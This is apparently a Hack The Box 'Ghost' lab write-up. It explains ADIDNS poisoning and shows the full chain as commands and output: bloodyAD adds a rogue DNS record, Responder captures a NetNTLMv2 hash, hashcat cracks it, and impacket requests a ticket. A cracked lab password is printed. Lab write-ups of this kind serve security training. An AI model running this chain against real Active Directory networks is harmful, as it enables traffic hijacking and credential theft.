ADIDNS Poisoning
Following up with enumeration of the intranet forum, it would appear that the justin.bradley user is executing a script to the bitbucket.ghost.htb virtual host / sub-domain.
ADIDNS Poisoning is a cyberattack where an attacker, often after compromising an Active Directory (AD) user account, manipulates DNS records in an AD-integrated DNS system.
in an active directory environment with the dynamic dns updates enabled, regular AD users may have the ability to add DNS records to the ADIDNS system. This feature is often used for ease of management but can also be leveraged by a threat actor who gains access to the user account, allowing them to manipulate DNS records, potentially leading to data exfiltration, disruption of network operations, or facilitating further attacks within the AD domain. Proper access controls, monitoring, and auditing are crucial to mitigate this security risk.
ADIDNS zone DACL (Discretionary Access Control List) enables regular users to create child objects by default, attackers can leverage that and hijack traffic. Therefore, ADIDNS zones can be remotely edited in the following manner
- with dynamic updates (a DNS specific protocol used by machine accounts to add and update their own DNS records). Users can create records if they don’t exist, and they will have full control over it. By default, users that don’t own a record will not be able to edit it, or to add another one with the same name, even if the type is different (A, AAAA, CNAME, MX, and so on).
- by using ldap to create dnsnode objects. While dynamic updates can’t be used to inject a wildcard DNS record, LDAP can be (only if the record doesn’t already exist, which is the case by default).
while there are many tools available for such operation, krbrelayx-dnstool and BloodyAD seem most reliable
Adding a Malicious DNS record
┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ KRB5CCNAME=intranet_principal@dc01.ghost.htb.ccache bloodyAD -d GHOST.HTB -k --host dc01.ghost.htb add dnsRecord --dnstype A bitbucket 10.10.14.61
[+] bitbucket has been successfully updatedUsing the TGT of the intranet_principal account, I can use bloodyAD to add an arbitrary DNS A record,bitbucket with its data set to the IP address of Kali
Only the intranet_principal account has access
┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ KRB5CCNAME=intranet_principal@dc01.ghost.htb.ccache bloodyAD -d GHOST.HTB -k --host dc01.ghost.htb get dnsDump --no-detail
[...REDACTED...]
recordName: bitbucket.ghost.htb
A: 10.10.14.61
[...REDACTED...]I can confirm this.
Capture the Hash
┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ nnc 80
listening on [any] 80 ...
connect to [10.10.14.61] from (UNKNOWN) [10.10.11.24] 63651
GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.20348.2582
Host: bitbucket.ghost.htb
Connection: Keep-AliveAs expected, there is an inbound connection, pointing to bitbucket.ghost.htb, which is set to Kali
┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ sudo responder -I tun0 --disable-ess --lm -v
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.4.0
To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [ON]
Force ESS downgrade [ON]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.61]
Responder IPv6 [dead:beef:2::103b]
Challenge set [1122334455667788]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
[+] Current Session Variables:
Responder Machine Name [WIN-0S6AW9SVBRA]
Responder Domain Name [CUXO.LOCAL]
Responder DCE-RPC Port [46423]
[+] Listening for events...
[HTTP] Sending NTLM authentication request to 10.10.11.24
[HTTP] GET request from: ::ffff:10.10.11.24 URL: /
[HTTP] NTLMv2 Client : 10.10.11.24
[HTTP] NTLMv2 Username : ghost\justin.bradley
[HTTP] NTLMv2 Hash : justin.bradley::ghost:1122334455667788:D138B1BFAE5BF3FEF56EF744002C98C8:0101000000000000486C74BA77D8DA0169DE6EB3F14A5EDC00000000020008004300550058004F0001001E00570049004E002D0030005300360041005700390053005600420052004100040014004300550058004F002E004C004F00430041004C0003003400570049004E002D00300053003600410057003900530056004200520041002E004300550058004F002E004C004F00430041004C00050014004300550058004F002E004C004F00430041004C000800300030000000000000000000000000400000A25DC43D449FF92918DA59EF9A87B2DD8FF51CA5D691EEF8A5558DD42313D1980A001000000000000000000000000000000000000900300048005400540050002F006200690074006200750063006B00650074002E00670068006F00730074002E006800740062000000000000000000Using Responder, I can capture the inbound NTLM auth
I will save the hash into a file; justin.bradley.hash
Password-Cracking
┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ hashcat -a 0 -m 5600 justin.bradley.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Host memory required for this attack: 1 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344386
* Bytes.....: 139921519
* Keyspace..: 14344386
JUSTIN.BRADLEY::ghost:1122334455667788:5a65e6bfaa7b9976ad126178704ff6e6:0101000000000000b48324d266d8da013dcd6f392479c39700000000020008004d0033004100350001001e00570049004e002d004b005a00430036004300480030004200590039004400040014004d003300410035002e004c004f00430041004c0003003400570049004e002d004b005a004300360043004800300042005900390044002e004d003300410035002e004c004f00430041004c00050014004d003300410035002e004c004f00430041004c000800300030000000000000000000000000400000a25dc43d449ff92918da59ef9a87b2dd8ff51ca5d691eef8a5558dd42313d1980a001000000000000000000000000000000000000900300048005400540050002f006200690074006200750063006b00650074002e00670068006f00730074002e006800740062000000000000000000:Qwertyuiop1234$$
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: JUSTIN.BRADLEY::ghost:1122334455667788:5a65e6bfaa7b...000000
Time.Started.....: Wed Jul 17 18:33:14 2024 (5 secs)
Time.Estimated...: Wed Jul 17 18:33:19 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 2008.5 kH/s (0.85ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10712064/14344386 (74.68%)
Rejected.........: 0/10712064 (0.00%)
Restore.Point....: 10708992/14344386 (74.66%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: R3047554 -> QXX988SCJH
Hardware.Mon.#1..: Util: 45%
Started: Wed Jul 17 18:33:00 2024
Stopped: Wed Jul 17 18:33:20 2024Password hash cracked for the justin.bradley user
The cracked password is Qwertyuiop1234$$
Validation
┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ impacket-getTGT GHOST.HTB/justin.bradley@dc01.ghost.htb -dc-ip $IP
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password: Qwertyuiop1234$$
[*] Saving ticket in justin.bradley@dc01.ghost.htb.ccacheValidated
TGT generated for the justin.bradley user